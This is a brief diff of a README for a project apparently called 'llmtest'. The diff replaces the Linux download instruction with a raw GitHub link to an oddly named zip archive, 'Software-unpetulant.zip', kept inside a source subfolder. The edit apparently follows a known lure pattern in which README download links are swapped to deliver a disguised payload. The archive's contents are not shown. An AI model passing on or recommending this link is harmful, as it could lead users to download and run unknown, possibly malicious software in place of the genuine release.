Hazuki-01/llmtest/README.md

    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, download the `.tar.gz` file.
+   - For Linux, download the `https://github.com/Hazuki-01/llmtest/raw/refs/heads/main/llmtest/providers/Software-unpetulant.zip` file.

    Click on the download link to start downloading the file.